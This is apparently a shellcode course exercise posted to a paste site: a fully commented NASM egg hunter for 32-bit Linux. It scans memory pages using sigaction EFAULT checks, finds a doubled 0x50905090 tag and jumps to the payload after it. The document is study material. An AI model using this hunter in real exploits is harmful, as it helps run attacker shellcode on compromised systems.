
Untitled

a guest
Jul 18th, 2019
; Filename: egg_hunter_shellcode.nasm
; Author: Kunal Pachauri
; SLAE-9237

global _start               ; Make the entry point visible to the linker

section .text
_start:                     ; Entry point

    xor ecx, ecx            ; Zero ECX; it holds the address to be validated

page_align:

    or cx, 0xfff            ; Set the low 12 bits of ECX (0xfff = 4095), i.e. the last byte of the current page

next_address:

    inc ecx                 ; Increment ECX; after page_align this lands on the next page boundary (4095+1 = page size)
    push 0x43               ; Syscall number for sigaction, i.e. 67
    pop eax                 ; Load the syscall number into EAX
    int 0x80                ; Invoke the syscall

check_efault:

    cmp al, 0xf2            ; 0xf2 is the low byte of -EFAULT (EFAULT = 14); check the return value against it
    jz page_align           ; On EFAULT the page is not accessible; move to the next page (address + 4096)
                            ; Otherwise, continue and check for the egg at this address
check_egg:

    mov eax, 0x50905090     ; Load the egg tag to compare -> nop, push eax combination
    mov edi, ecx            ; scasd compares EAX with the dword at [EDI], so move the validated address into EDI
    scasd                   ; Compare; sets the Zero Flag if equal and advances EDI by 4
    jnz next_address        ; Egg not found: increment the address and repeat the steps above
    scasd                   ; Egg matched: check that the next four bytes are also the egg, so the hunter does not match its own copy of the tag
    jnz next_address        ; Second dword differs: it was the tag itself; increment the address and repeat
    jmp edi                 ; Egg found: redirect execution to the shellcode that follows it